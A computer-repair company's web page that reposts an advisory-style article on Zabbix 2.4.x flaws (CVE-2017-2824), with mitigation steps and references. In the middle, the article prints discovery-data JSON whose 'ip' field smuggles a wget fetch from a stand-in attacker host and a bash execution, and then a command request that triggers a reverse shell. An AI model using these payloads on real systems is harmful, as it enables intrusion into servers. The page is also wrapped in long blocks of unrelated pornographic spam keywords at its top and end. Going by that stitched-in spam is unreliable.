国产精品久av福利在线观看_亚洲一区国产精品_亚洲黄色一区二区三区_欧美成人xxxx_国产精品www_xxxxx欧美_国产精品久久婷婷六月丁香_国产特级毛片

錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務(wù)項(xiàng)目 服務(wù)報價 維修流程 IT外包服務(wù) 服務(wù)器維護(hù) 技術(shù)文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù)技術(shù)文章
Zabbix爆遠(yuǎn)程代碼執(zhí)行漏洞、數(shù)據(jù)庫寫入高危漏洞

作者: 佚名  日期:2017-05-01 18:02:11   來源: 本站整理

 
關(guān)于Zabbix
zabbix是一個基于WEB界面的提供分布式系統(tǒng)監(jiān)視以及網(wǎng)絡(luò)監(jiān)視功能的企業(yè)級的開源解決方案。
zabbix能監(jiān)視各種網(wǎng)絡(luò)參數(shù),保證服務(wù)器系統(tǒng)的安全運(yùn)營;并提供靈活的通知機(jī)制以讓系統(tǒng)管理員快速定位/解決存在的各種問題。
漏洞描述
    Zabbix Server Active Proxy Trapper 遠(yuǎn)程代碼執(zhí)行漏洞 (CVE-2017-2824)★★★★
    Zabbix 2.4.x中的trapper command功能存在一處代碼執(zhí)行漏洞,特定的數(shù)據(jù)包可造成命令注入,進(jìn)而遠(yuǎn)程執(zhí)行代碼,攻擊者可以從一個Zabbix proxy 發(fā)起請求從而促發(fā)漏洞。
漏洞細(xì)節(jié)
該漏洞位于Zabbix中“Trapper”代碼部分,它的主要功能是允許Proxy和Server進(jìn)行通信的網(wǎng)絡(luò)服務(wù)(TCP端口10051)Zabbix Server提供了一組針對Zabbix Proxy的API調(diào)用,兩個將討論的是“discovery data”和“request command”。這些請求的示例數(shù)據(jù)如下所示:
'{"request":"command","scriptid":1,"hostid":10001}'
'{"request":"discovery data","host":"zabbix-proxy.com","clock":10,
"data":[{"clock":10,"drule":1,"dcheck2,"type":0,"ip:10.0.0.1, "dns":"zabbix-agent.com",    port":10050,"key":"test","status":0,"value":"test_value"}]}
應(yīng)該注意的是,request命令調(diào)用位于Zabbix數(shù)據(jù)庫中的腳本,而不進(jìn)行任何身份驗(yàn)證。該漏洞的另一個關(guān)鍵方面是,默認(rèn)情況下,Zabbix 2.4.X使用腳本以下表中的3個腳本填充MySQL數(shù)據(jù)庫:
# scriptid == 1 == /bin/ping -c {HOST.CONN} 2>&1
# scriptid == 2 == /usr/bin/traceroute {HOST.CONN} 2>&1
# scriptid == 3 == sudo /usr/bin/nmap -O {HOST.CONN} 2>&1
問題在于,在調(diào)用腳本時,{HOST.CONN}字段實(shí)際上被host的IP地址替換。替換{HOST.CONN}的值位于Zabbixinterface表中,然后保存成VARCHAR(64)類型的“IP”字段。因此,如果攻擊者可以使用命令注入創(chuàng)建接口作為IP地址,并且通過“命令”請求的方式運(yùn)行{HOST.CONN}腳本,則將發(fā)生命令注入,并且可以獲得反向shell。
這個難題在于有效地將值插入到Zabbixhost表。默認(rèn)情況下,未經(jīng)身份驗(yàn)證的攻擊者無法做到這一點(diǎn),它需要系統(tǒng)管理員的一個次要配置,特別是關(guān)于Zabbix自動發(fā)現(xiàn)功能。
Zabbix自動發(fā)現(xiàn)和自動注冊功能允許根據(jù)Zabbix Proxy提供的Zabbix Server數(shù)據(jù)進(jìn)行Zabbix Server的配置。更具體地說,如果主機(jī)根據(jù)服務(wù)器的配置向Zabbix Proxy提供某些特性,則可能會采取某些操作,其中一個會使新發(fā)現(xiàn)的主機(jī)被添加到某些Zabbix數(shù)據(jù)庫表中。在這種情況下,主機(jī)將被插入到“host”表中,并且將創(chuàng)建一個入口到Zabbixinterface表中,主機(jī)提供的IP地址插入到IP列中,而不會對該IP地址的任何驗(yàn)證。
因此,通過使用合適的主機(jī)向服務(wù)器發(fā)送一個發(fā)現(xiàn)數(shù)據(jù)請求,可以將命令注入插入到數(shù)據(jù)庫中:
 write_script_cmd='{
"request":"discoverydata",
"host":"zabbix-proxy.domain.fake",
"clock":148535399,
"data":[{
"clock":1485353070,
"drule":88,
"dcheck":174,
"type":0,
"ip":";wget -O/tmp/shttp://attacker-ip/s;#",
"dns":"host28.domain.fake",
"port":10050,
"key":"sectest",
"status":0,
"value":"lnxhost"
}]}'
由于ZabbixInterface表的ip字段的大小限制,第二個主機(jī)被插入到另一個IP地址的表中。
// Host 2
ip:/bin/bash /tmp/s;#
在這兩個主機(jī)被添加之后,仍然有一個問題,即不知道該hostid的command請求,但是這很容易解決了。暴力請求入數(shù)據(jù)庫,因?yàn)椴煌拿钫埱髸祷夭煌捻憫?yīng),確定主機(jī)是否存在,一旦存在的主機(jī)被確定,就可以直接調(diào)用它們,并且可以獲得反向的shell。命令請求如下所示
run_cmd = '{
"request":"command",
"scriptid":1,
"hostid":14666
}'
   
緩解措施
    刪除Zabbix數(shù)據(jù)庫中的默認(rèn)腳本條目,可以直接操作數(shù)據(jù)庫刪除 sql 為: use zabbix; delete * from scripts;  ,也可使用圖形界面刪除 (Administration->Scripts->Checkmarks->Delete Selected).
    
    Zabbix Proxy 數(shù)據(jù)庫寫入漏洞(CVE-2017-2824)
    Zabbix 2.4.x中的trapper功能存在一處數(shù)據(jù)庫寫漏洞,特定的惡意trapper數(shù)據(jù)包可通過database 的邏輯檢查,造成數(shù)據(jù)庫寫入,攻擊者可通過中間人的方式修改zabbix  proxy 和 Server間的請求來觸發(fā)漏洞。
影響版本   
 Zabbix 2.4.7 - 2.4.8r1
參考
http://blog.talosintelligence.com/2017/04/zabbix-multiple-vulns.html
http://www.talosintelligence.com/reports/TALOS-2017-0325/
http://www.talosintelligence.com/reports/TALOS-2017-0326/
https://support.zabbix.com/browse/ZBX-12075
https://support.zabbix.com/browse/ZBX-12076



熱門文章
  • 機(jī)械革命S1 PRO-02 開機(jī)不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點(diǎn)不...
  • 三星一體激光打印機(jī)SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來減少網(wǎng)絡(luò)請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機(jī)始終停留在開機(jī)界面...
  • 常見打印機(jī)清零步驟
  • 安裝驅(qū)動時提示不包含數(shù)字簽名的解...
  • 共享打印機(jī)需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機(jī)的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護(hù),上門維修電腦,黑屏藍(lán)屏死機(jī)故障排除,無線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    欧美日韩裸体免费视频| 中文字幕在线精品| aaaaaav| 深夜福利一区| 久久精品国产精品国产精品污 | 欧美另类xxx| www.三区| 欧美日韩不卡一区二区| 国产porn视频| 色狠狠av一区二区三区香蕉蜜桃| 深夜福利一区| 四虎影院在线免费播放| 亚洲国产精品人人爽夜夜爽| 日韩精品卡一| 欧美熟妇精品一区二区| 中文字幕一区二区三区乱码图片| 男人插女人下面免费视频| 日韩av中文字幕一区| 亚洲一区二区三区精品在线观看| 欧美精品一级| 国产伦精品一区二区三区88av| 伊人久久大香| 日本一区视频在线观看| 日韩高清不卡一区| 日本中文字幕第一页| 一级黄色大片免费观看| 色综合视频一区二区三区高清| 国产一区二区播放| 久久99精品久久久久婷婷| 国产麻豆免费视频| 欧美成年人视频网站欧美| 天堂日韩电影| 日本韩国免费观看| 久久亚洲综合网| 韩国女主播成人在线| 思思久久99热只有频精品66| 欧美激情国产精品| 欧美高清影院| 超碰97人人射妻| 国产一区二区三区不卡在线观看| 麻豆av一区| 亚洲麻豆视频| 丰满人妻一区二区三区四区| 国产河南妇女毛片精品久久久 | 国产999在线| 国产综合视频一区二区三区免费| 国产精品久久国产精品| 激情视频一区二区三区| 国产在线视频二区| 日韩一区二区不卡| 色网站免费在线观看| 亚洲色图偷拍视频| 日韩女优毛片在线| 天天操夜夜爽| 在线观看福利一区| 色综合久久66| 欧美aaaxxxx做受视频| 熟妇人妻无乱码中文字幕真矢织江| 葵司免费一区二区三区四区五区| 天天干天天干天天干天天| 在线成人动漫av| 亚洲一区二区三区网站| 国产一区二区三区在线| 九九99九九精彩| 欧美极品少妇xxxxⅹ免费视频| 第九色区av在线| 精品伦理一区二区三区| 日韩欧美黄色| 精品无码久久久久久久| 日韩视频免费在线观看| 精品久久网站| 欧美日韩色视频| 日韩三级av在线播放| 激情小视频在线| 高清国产免费| ririsao久久精品一区| 亚洲黄色大片| 欧美午夜精品一区二区三区| 91色精品视频在线| 97精品人人妻人人| 欧美久草视频| jizz免费一区二区三区| www.亚洲在线| 欧美裸体男粗大视频在线观看| www国产黄色| 性猛交xxxx乱大交孕妇印度| 国产麻豆一精品一男同| 成人在线视频成人| 激情成人综合| 6080午夜不卡| 一区二区三区国| 无码人妻久久一区二区三区 | av鲁丝一区鲁丝二区鲁丝三区| 国产第一页第二页| 91美女在线| 亚洲综合中文| 欧美丰满一区二区免费视频| 蜜桃精品久久久久久久免费影院| 疯狂试爱三2浴室激情视频| av网站免费在线| 日韩欧美大片| 3d动漫精品啪啪| 日韩精品第1页| 国产成人精品毛片| 成人免费网站视频| 国产欧美视频一区二区三区| 欧美做受高潮1| 国产精品久久久久无码av色戒| 色先锋影音av| 91精品久久久久久久蜜月| 欧美自拍偷拍午夜视频| 亚洲一区三区电影在线观看| 懂色av蜜臀av粉嫩av喷吹 | 狠狠色狠狠色合久久伊人| 久久精品99无色码中文字幕| ass极品水嫩小美女ass| 夜夜操天天干| 亚洲精品九九| 日韩三级成人av网| 真人bbbbbbbbb毛片| 全部孕妇毛片丰满孕妇孕| 99视频在线精品国自产拍免费观看| 日韩福利在线播放| 亚洲成人手机在线观看| 丝袜制服影音先锋| 亚洲一区二区免费看| www.欧美免费| 亚洲乱妇老熟女爽到高潮的片 | 欧美最猛性xxxxx(亚洲精品)| 成人黄色短视频| 尤物视频在线免费观看| 99精品一区二区| 91九色蝌蚪嫩草| 亚洲视频中文字幕在线观看| 国产激情欧美| 欧洲精品中文字幕| 白嫩少妇丰满一区二区| a级女人18毛片| 久久精品一区二区国产| 久久久最新网址| 欧美日韩免费做爰视频| 超免费在线视频| 亚洲线精品一区二区三区| 亚洲欧洲三级| 狠狠综合久久久综合| 欧美激情偷拍自拍| 久久久极品av| 毛片a片免费观看| 日韩影片中文字幕| 日本丶国产丶欧美色综合| 日本熟妇人妻xxxxx| 1069男同网址| 国产福利一区二区三区视频 | www.久久撸.com| 91人妻一区二区三区蜜臀| 99热99re6国产在线播放| 午夜精品爽啪视频| 国产97色在线 | 日韩| 免费看美女隐私的视频| 成人午夜精品在线| 青青草原成人| seba5欧美综合另类| 日韩国产在线观看| 亚洲精品欧美一区二区三区| 欧美一级做性受免费大片免费| 免费成人网www| 超碰日本道色综合久久综合| 日本少妇性高潮| 色悠久久久久综合先锋影音下载| 日韩精品中文字幕久久臀| 一级特黄曰皮片视频| 成人免费黄色网址| 国产福利一区二区三区视频在线 | 国产成人精品999| 国产精品久久久久久久久毛片| 日韩欧美中文字幕电影| 欲色天天网综合久久| 久久精品国产亚洲AV无码男同| 国产在视频一区二区三区吞精| 欧美草草影院在线视频| 中文字幕国产专区| 成人私拍视频| 精品成人a区在线观看| 日韩一区二区三区四区视频| 国产美女久久| 亚洲新声在线观看| 羞羞影院体验区| 欧洲杯什么时候开赛| 欧美中文字幕在线观看| 免费国产羞羞网站视频| 另类亚洲自拍| 久久九九视频| 男女无套免费网站| 国产精品久久夜| 亚洲一级免费观看| 在线看福利影| 亚洲成成品网站| 五月婷婷视频在线| 亚洲天天影视网| 精品国产aⅴ麻豆|